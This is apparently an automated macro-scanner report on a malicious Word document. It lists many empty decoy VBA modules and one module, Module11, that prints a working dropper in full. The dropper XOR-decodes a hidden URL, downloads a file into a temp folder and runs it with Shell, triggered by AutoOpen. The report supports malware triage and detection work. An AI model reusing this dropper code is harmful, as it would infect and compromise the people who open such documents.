Malicious Word macro

1. Flags       Filename                                                        
2. ----------- -----------------------------------------------------------------
3. OLE:MAS---- irn001~1.doc
4.  
5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
6.  
7. ===============================================================================
8. FILE: irn001~1.doc
9. Type: OLE
10. -------------------------------------------------------------------------------
11. VBA MACRO ThisDocument.cls
12. in file: irn001~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
14. Sub autoopen()
15. N1
16. End Sub
17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
18. ANALYSIS:
19. +----------+----------+---------------------------------------+
20. | Type     | Keyword  | Description                           |
21. +----------+----------+---------------------------------------+
22. | AutoExec | AutoOpen | Runs when the Word document is opened |
23. +----------+----------+---------------------------------------+
24. -------------------------------------------------------------------------------
25. VBA MACRO Class1.cls
26. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class1'
27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
28.  
29. Private Function UmYcCcn()
30.  
31. End Function
32. Private Sub TpNGCNftO()
33.  
34. End Sub
35. Public Sub fHJqKPY()
36.  
37. End Sub
38. Public Sub CBGdkrVjiyB()
39.  
40. End Sub
41. Public Sub kdMvxRuzMJsFffG()
42.  
43. End Sub
44. Public Function QCbsSsDxPzV()
45.  
46. End Function
47. Public Sub SevJRSdAvZaGNgo()
48.  
49. End Sub
50. Public Function FDIuAHZzyOE()
51.  
52. End Function
53. Private Function EjhOD()
54.  
55. End Function
56. Public Sub SdLLyyajvQr()
57.  
58. End Sub
59. Private Function YMJDVSqakqmyO()
60.  
61. End Function
62. Private Function wTBeubh()
63.  
64. End Function
65. Private Function dZZYdNGNsS()
66.  
67. End Function
68. Public Function bSrUzjfTofUjtcc()
69.  
70. End Function
71. Private Function zLaHZ()
72.  
73. End Function
74. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
75. ANALYSIS:
76. No suspicious keyword or IOC found.
77. -------------------------------------------------------------------------------
78. VBA MACRO Class2.cls
79. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class2'
80. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
81.  
82. Private Sub DMQRvKdxQKA()
83.  
84. End Sub
85. Public Sub oteQeIVU()
86.  
87. End Sub
88. Private Sub jHQPzikE()
89.  
90. End Sub
91. Private Function JfsgRtPOqY()
92.  
93. End Function
94. Private Sub FfrlDA()
95.  
96. End Sub
97. Public Function JFQixSFPniLNtN()
98.  
99. End Function
100. Private Sub wFGEJhnuZmlBEH()
101.  
102. End Sub
103. Public Sub gQyAUxCP()
104.  
105. End Sub
106. Private Sub iiJRfGbFevVw()
107.  
108. End Sub
109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
110. ANALYSIS:
111. No suspicious keyword or IOC found.
112. -------------------------------------------------------------------------------
113. VBA MACRO Class3.cls
114. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class3'
115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
116.  
117. Public Function lLQQjgCYxplw()
118.  
119. End Function
120. Public Sub mvSNrtatzH()
121.  
122. End Sub
123. Private Function mkpMSaE()
124.  
125. End Function
126. Private Sub lnfETL()
127.  
128. End Sub
129. Private Function Adivsb()
130.  
131. End Function
132. Public Function pyKmGlJcBcnhz()
133.  
134. End Function
135. Public Sub zFBNetAC()
136.  
137. End Sub
138. Public Sub HJqwP()
139.  
140. End Sub
141. Public Function oonsdjrHi()
142.  
143. End Function
144. Private Sub qiGkOMu()
145.  
146. End Sub
147. Private Function kyIrrefFO()
148.  
149. End Function
150. Public Function BasEspjByVFPVRe()
151.  
152. End Function
153. Public Function SczhKaGMgodJEE()
154.  
155. End Function
156. Public Sub mtYykADGy()
157.  
158. End Sub
159. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
160. ANALYSIS:
161. No suspicious keyword or IOC found.
162. -------------------------------------------------------------------------------
163. VBA MACRO Class4.cls
164. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class4'
165. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
166.  
167. Private Sub eJEFDIuAZzyOEHyYAgeL()
168.  
169. End Sub
170. Private Sub BPaIIvvQfsTorIUJGASPmVhnju()
171.  
172. End Sub
173. Private Function ktQxbrexFuaVVTZKDKpPB()
174.  
175. End Function
176. Private Sub PoRwgcQlbRgqZZL()
177.  
178. End Sub
179. Private Function IQEVHLlaQ()
180.  
181. End Function
182. Private Sub DZxDzL()
183.  
184. End Sub
185. Private Sub AJTNrHauNH()
186.  
187. End Sub
188. Private Function mlqbTbF()
189.  
190. End Function
191. Public Function logETM()
192.  
193. End Function
194. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
195. ANALYSIS:
196. No suspicious keyword or IOC found.
197. -------------------------------------------------------------------------------
198. VBA MACRO Class5.cls
199. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class5'
200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
201.  
202. Private Function cBcnhziFpzFB()
203.  
204. End Function
205. Public Function ACLjeHJqw()
206.  
207. End Function
208. Public Function soonsdjrHihxn()
209.  
210. End Function
211. Private Sub kOMujDtkyIrr()
212.  
213. End Sub
214. Public Function ObDQBasEspj()
215.  
216. End Function
217. Public Sub FPVReuvQSczhKaG()
218.  
219. End Sub
220. Private Sub dJEEDItm()
221.  
222. End Sub
223. Public Sub kADGyQAfOK()
224.  
225. End Sub
226. Public Function BOZHHvhIfrFn()
227.  
228. End Function
229. Public Sub UIFzRPmHg()
230.  
231. End Sub
232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
233. ANALYSIS:
234. No suspicious keyword or IOC found.
235. -------------------------------------------------------------------------------
236. VBA MACRO Class6.cls
237. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class6'
238. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
239.  
240. Private Sub QQjgD()
241.  
242. End Sub
243. Public Function zLOdyAJTNrH()
244.  
245. End Function
246. Public Function HxdmmlqbTbFSR()
247.  
248. End Function
249. Public Sub gETMwehB()
250.  
251. End Sub
252. Public Function GcpcOqMKn()
253.  
254. End Function
255. Public Sub cCcnhzwTpNGCNft()
256.  
257. End Sub
258. Public Sub kfHJqKPYNtCCB()
259.  
260. End Sub
261. Public Function rVjiyBEUkdMvxRuz()
262.  
263. End Function
264. Private Function FffGOcDQ()
265.  
266. End Function
267. Private Sub SsDxPzVFQ()
268.  
269. End Sub
270. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
271. ANALYSIS:
272. No suspicious keyword or IOC found.
273. -------------------------------------------------------------------------------
274. VBA MACRO Module1.bas
275. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module1'
276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
277. Public Function rUkQQqyoTOPN()
278.  
279. End Function
280. Public Sub EiJuKOQIi()
281.  
282. End Sub
283. Public Sub VJeUL()
284.  
285. End Sub
286. Public Sub RFsSpBQxOBFfSQ()
287.  
288. End Sub
289. Private Function wSrxt()
290.  
291. End Function
292. Private Function stDMHlAToGBqQfg()
293.  
294. End Function
295. Private Function NUyLKbfiZyNFqY()
296.  
297. End Function
298. Private Sub cqAUjVIjFEhNgRV()
299.  
300. End Sub
301. Private Sub btqMjH()
302.  
303. End Sub
304. Private Sub YnIwFdYBDkEJ()
305.  
306. End Sub
307. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
308. ANALYSIS:
309. No suspicious keyword or IOC found.
310. -------------------------------------------------------------------------------
311. VBA MACRO Module2.bas
312. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module2'
313. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
314. Private Function BQxOBFfS()
315.  
316. End Function
317. Private Function awSrx()
318.  
319. End Function
320. Public Function QstDMHlAToGB()
321.  
322. End Function
323. Public Sub gejTNU()
324.  
325. End Sub
326. Public Function bfiZyNFqYavYqAUjV()
327.  
328. End Function
329. Private Function EhNgRVvVhbt()
330.  
331. End Function
332. Public Function HzvHYnI()
333.  
334. End Function
335. Public Function YBDkE()
336.  
337. End Function
338. Public Function nvwuzQelPccr()
339.  
340. End Function
341. Public Function OeQGorLo()
342.  
343. End Function
344. Private Function mzZZAIUxQwT()
345.  
346. End Function
347. Public Function xrJtPzK()
348.  
349. End Function
350. Public Sub pDLMVuoRTAGaiYD()
351.  
352. End Sub
353. Private Sub CnuBRssHyA()
354.  
355. End Sub
356. Private Function ZQEtNEvIT()
357.  
358. End Function
359. Private Function pQZlNhMk()
360.  
361. End Function
362. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
363. ANALYSIS:
364. No suspicious keyword or IOC found.
365. -------------------------------------------------------------------------------
366. VBA MACRO Module3.bas
367. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module3'
368. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
369. Private Sub OcDQCbsSsDx()
370.  
371. End Sub
372. Private Sub FQQSevJRSdAvZaG()
373.  
374. End Sub
375. Private Function eJEFDIuA()
376.  
377. End Function
378. Private Sub yOEHyYAgeL()
379.  
380. End Sub
381. Private Function BPaIIvvQfsTo()
382.  
383. End Function
384. Private Sub UJGASPmVhnju()
385.  
386. End Sub
387. Public Function ktQxbr()
388.  
389. End Function
390. Private Sub FuaVVTZKD()
391.  
392. End Sub
393. Public Sub BQUYPoRwgcQlb()
394.  
395. End Sub
396. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
397. ANALYSIS:
398. No suspicious keyword or IOC found.
399. -------------------------------------------------------------------------------
400. VBA MACRO Module4.bas
401. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module4'
402. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
403. Private Function frFnEquUIFzR()
404.  
405. End Function
406. Public Function gmiuxLijsCxb()
407.  
408. End Function
409. Public Function wqgLU()
410.  
411. End Function
412. Public Function JCJoBAQTQOoCvgN()
413.  
414. End Function
415. Private Sub RfpKYLxZvuVDU()
416.  
417. End Sub
418. Public Sub LQQjgCY()
419.  
420. End Sub
421. Private Function wNdymvS()
422.  
423. End Function
424. Public Sub atzHwclmk()
425.  
426. End Sub
427. Private Sub aERQhlnfETLweg()
428.  
429. End Sub
430. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
431. ANALYSIS:
432. No suspicious keyword or IOC found.
433. -------------------------------------------------------------------------------
434. VBA MACRO Module5.bas
435. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module5'
436. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
437. (empty macro)
438. -------------------------------------------------------------------------------
439. VBA MACRO Module6.bas
440. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module6'
441. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
442. Public Function bfiZyNFqYavY()
443.  
444. End Function
445. Public Function UjVIjFEhNg()
446.  
447. End Function
448. Public Sub VhbtqMjHz()
449.  
450. End Sub
451. Public Function nIwFdYBDkEJRHnv()
452.  
453. End Function
454. Public Sub QelPccrvyp()
455.  
456. End Sub
457. Public Sub GorLosGCmzZZAIU()
458.  
459. End Sub
460. Private Function TmLmxrJtP()
461.  
462. End Function
463. Private Sub LYpDLMVuoRTAGa()
464.  
465. End Sub
466. Private Sub yzxCnuBRssH()
467.  
468. End Sub
469. Public Sub RuZQEtNEv()
470.  
471. End Sub
472. Public Sub BppQZlNhMkC()
473.  
474. End Sub
475. Private Function uMJgPbgdoF()
476.  
477. End Function
478. Private Function mKrUk()
479.  
480. End Function
481. Private Sub yoTOPNSD()
482.  
483. End Sub
484. Private Sub JuKOQI()
485.  
486. End Sub
487. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
488. ANALYSIS:
489. No suspicious keyword or IOC found.
490. -------------------------------------------------------------------------------
491. VBA MACRO Module7.bas
492. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module7'
493. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
494. Public Sub OeQGorLoGCmzZZAIU()
495.  
496. End Sub
497. Public Sub TmLmxrJtPKPLYpDLMVu()
498.  
499. End Sub
500. Private Sub AGaiYDyzxCnuBR()
501.  
502. End Sub
503. Public Sub yAsRuZQEtNEv()
504.  
505. End Sub
506. Public Function BppQZlNhMkCCAuMJgPbgdoFG()
507.  
508. End Function
509. Private Sub KrUkQQq()
510.  
511. End Sub
512. Private Sub OPNSDwEiJuKOQI()
513.  
514. End Sub
515. Public Function aVJeULak()
516.  
517. End Function
518. Private Function sSpBQxOBFfS()
519.  
520. End Function
521. Private Function awSrxEHQstDMHl()
522.  
523. End Function
524. Public Function GBqQfgej()
525.  
526. End Function
527. Private Sub yLKbfiZyNFqYav()
528.  
529. End Sub
530. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
531. ANALYSIS:
532. No suspicious keyword or IOC found.
533. -------------------------------------------------------------------------------
534. VBA MACRO Module8.bas
535. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module8'
536. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
537. Public Sub hxnqiG()
538.  
539. End Sub
540. Private Function ujDtkyIrrefFO()
541.  
542. End Function
543. Public Sub BasEspjByVFPVRevQSczhKaG()
544.  
545. End Sub
546. Private Function dJEEDItmYykADGyQA()
547.  
548. End Function
549. Private Function zTKBOZHHvhIf()
550.  
551. End Function
552. Public Function EquUIFz()
553.  
554. End Function
555. Private Sub HgmiuxL()
556.  
557. End Sub
558. Private Function CxbqIdwqg()
559.  
560. End Function
561. Public Function TZJCJoBAQTQOoCv()
562.  
563. End Function
564. Public Function kMRfpKYLxZvuV()
565.  
566. End Function
567. Public Sub KlLQQjgCYxpl()
568.  
569. End Sub
570. Private Function ymvSN()
571.  
572. End Function
573. Public Sub KPYNtCCB()
574.  
575. End Sub
576. Private Function rVjiyBE()
577.  
578. End Function
579. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
580. ANALYSIS:
581. No suspicious keyword or IOC found.
582. -------------------------------------------------------------------------------
583. VBA MACRO Module9.bas
584. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module9'
585. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
586. Public Sub UVTZJCJoBAQTQ()
587.  
588. End Sub
589. Private Sub vgNPkMRfpKY()
590.  
591. End Sub
592. Public Sub vuVDUGKlLQQjgCY()
593.  
594. End Sub
595. Private Sub wNdymvSrtatzHwclmkpM()
596.  
597. End Sub
598. Private Sub RQhlnfETLwe()
599.  
600. End Sub
601. Public Sub ivsbo()
602.  
603. End Sub
604. Public Sub yKmGlJcB()
605.  
606. End Sub
607. Private Function ziFpzF()
608.  
609. End Function
610. Private Function tACLje()
611.  
612. End Function
613. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
614. ANALYSIS:
615. No suspicious keyword or IOC found.
616. -------------------------------------------------------------------------------
617. VBA MACRO Module10.bas
618. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module10'
619. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
620. (empty macro)
621. -------------------------------------------------------------------------------
622. VBA MACRO Module11.bas
623. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module11'
624. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
625. #If VBA7 Then
626.     Private Declare PtrSafe Function GHGijkHKJG Lib "urlmon" Alias _
627.     "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
628.     ByVal sdfsdf As String, _
629.     ByVal jdfgdfg As String, _
630.     ByVal tjrtgefsdf As Long, _
631.     ByVal khlkdfsef As LongPtr) As LongPtr
632. #Else
633.     Private Declare Function GHGijkHKJG Lib "urlmon" Alias _
634.     "URLDownloadToFileA" (ByVal pCaller As Long, _
635.     ByVal sdfsdf As String, _
636.     ByVal jdfgdfg As String, _
637.     ByVal tjrtgefsdf As Long, _
638.     ByVal khlkdfsef As Long) As Long
639. #End If
640.  
641.  
642. Sub N1()
643. tiO XorByDataLen("—‹‹ÅÐЗš–”š—ž““Ñ›šÐ•ŒÐ–‘Ñš‡š"), Environ(XorByDataLen("«²¯")) & XorByDataLen("£¸·•”›™˜Ñš‡š")
644. Dim ZjplxNd As Integer
645. For ZjplxNd = 0 To 0
646. If ZjplxNd = 5 Then End
647. Next ZjplxNd
648. Dim bpQoaeEsqkC As Integer
649. For bpQoaeEsqkC = 0 To 0
650. If bpQoaeEsqkC = 5 Then End
651. Next bpQoaeEsqkC
652. End Sub
653. Function tiO(f243r14Z As String, x9 As String) As Boolean
654. vJHKBJdfkgfg = GHGijkHKJG(0&, f243r14Z, x9, 0&, 0&)
655. Dim erSnRqHiITNg As Integer
656. For erSnRqHiITNg = 0 To 0
657. If erSnRqHiITNg = 5 Then End
658. Next erSnRqHiITNg
659. Dim oocNpLYmT As Integer
660. For oocNpLYmT = 0 To 0
661. If oocNpLYmT = 5 Then End
662. Next oocNpLYmT
663. Dim OwZLs2
664. Dim KMhJO As Integer
665. For KMhJO = 0 To 0
666. If KMhJO = 5 Then End
667. Next KMhJO
668. Dim LYmTlQb As Integer
669. For LYmTlQb = 0 To 0
670. If LYmTlQb = 5 Then End
671. Next LYmTlQb
672. OwZLs2 = Shell(x9, 1)
673. Dim OcZHUuuVer As Integer
674. For OcZHUuuVer = 0 To 0
675. If OcZHUuuVer = 5 Then End
676. Next OcZHUuuVer
677. Dim ocNpLYm As Integer
678. For ocNpLYm = 0 To 0
679. If ocNpLYm = 5 Then End
680. Next ocNpLYm
681. End Function
682.  
683. Public Function XorByDataLen(sData As String) As String
684. Dim bData() As Byte
685. Dim ZvfqvsD As Integer
686. For ZvfqvsD = 0 To 0
687. If ZvfqvsD = 5 Then End
688. Next ZvfqvsD
689. Dim pKArFPyyl As Integer
690. For pKArFPyyl = 0 To 0
691. If pKArFPyyl = 5 Then End
692. Next pKArFPyyl
693. Dim i As Integer
694. Dim QvHHQbeVuJ As Integer
695. For QvHHQbeVuJ = 0 To 0
696. If QvHHQbeVuJ = 5 Then End
697. Next QvHHQbeVuJ
698. Dim Npaquw As Integer
699. For Npaquw = 0 To 0
700. If Npaquw = 5 Then End
701. Next Npaquw
702. If Len(sData) <> 0 Then
703. Dim xnSccaf As Integer
704. For xnSccaf = 0 To 0
705. If xnSccaf = 5 Then End
706. Next xnSccaf
707. Dim RCxmGxo As Integer
708. For RCxmGxo = 0 To 0
709. If RCxmGxo = 5 Then End
710. Next RCxmGxo
711. ReDim bData(Len(sData))
712. Dim NrEDTYbRrG As Integer
713. For NrEDTYbRrG = 0 To 0
714. If NrEDTYbRrG = 5 Then End
715. Next NrEDTYbRrG
716. Dim bQwrsqvgZgKl As Integer
717. For bQwrsqvgZgKl = 0 To 0
718. If bQwrsqvgZgKl = 5 Then End
719. Next bQwrsqvgZgKl
720. bData = StrConv(sData, vbFromUnicode)
721. Dim yYyJDVSp As Integer
722. For yYyJDVSp = 0 To 0
723. If yYyJDVSp = 5 Then End
724. Next yYyJDVSp
725. Dim dUuQB As Integer
726. For dUuQB = 0 To 0
727. If dUuQB = 5 Then End
728. Next dUuQB
729. For i = 0 To Len(sData) - 1
730. Dim NdwPje As Integer
731. For NdwPje = 0 To 0
732. If NdwPje = 5 Then End
733. Next NdwPje
734. Dim qyzJh As Integer
735. For qyzJh = 0 To 0
736. If qyzJh = 5 Then End
737. Next qyzJh
738. bData(i) = bData(i) Xor 255
739. Dim xPMkFekgs As Integer
740. For xPMkFekgs = 0 To 0
741. If xPMkFekgs = 5 Then End
742. Next xPMkFekgs
743. Dim CmxDzK As Integer
744. For CmxDzK = 0 To 0
745. If CmxDzK = 5 Then End
746. Next CmxDzK
747. Next i
748. Dim sfGcpDlCo As Integer
749. For sfGcpDlCo = 0 To 0
750. If sfGcpDlCo = 5 Then End
751. Next sfGcpDlCo
752. Dim dzjuzwHZ As Integer
753. For dzjuzwHZ = 0 To 0
754. If dzjuzwHZ = 5 Then End
755. Next dzjuzwHZ
756. XorByDataLen = StrConv(bData, vbUnicode)
757. Dim pcCZmAhzl As Integer
758. For pcCZmAhzl = 0 To 0
759. If pcCZmAhzl = 5 Then End
760. Next pcCZmAhzl
761. Dim yNGqY As Integer
762. For yNGqY = 0 To 0
763. If yNGqY = 5 Then End
764. Next yNGqY
765. End If
766. Dim TCCpcCZmAh As Integer
767. For TCCpcCZmAh = 0 To 0
768. If TCCpcCZmAh = 5 Then End
769. Next TCCpcCZmAh
770. Dim vYcqn As Integer
771. For vYcqn = 0 To 0
772. If vYcqn = 5 Then End
773. Next vYcqn
774. End Function
775.  
776.  
777. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
778. ANALYSIS:
779. +------------+--------------------+-----------------------------------------+
780. | Type       | Keyword            | Description                             |
781. +------------+--------------------+-----------------------------------------+
782. | Suspicious | Lib                | May run code from a DLL                 |
783. | Suspicious | Shell              | May run an executable file or a system  |
784. |            |                    | command                                 |
785. | Suspicious | Environ            | May read system environment variables   |
786. | Suspicious | Xor                | May attempt to obfuscate specific       |
787. |            |                    | strings                                 |
788. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
789. +------------+--------------------+-----------------------------------------+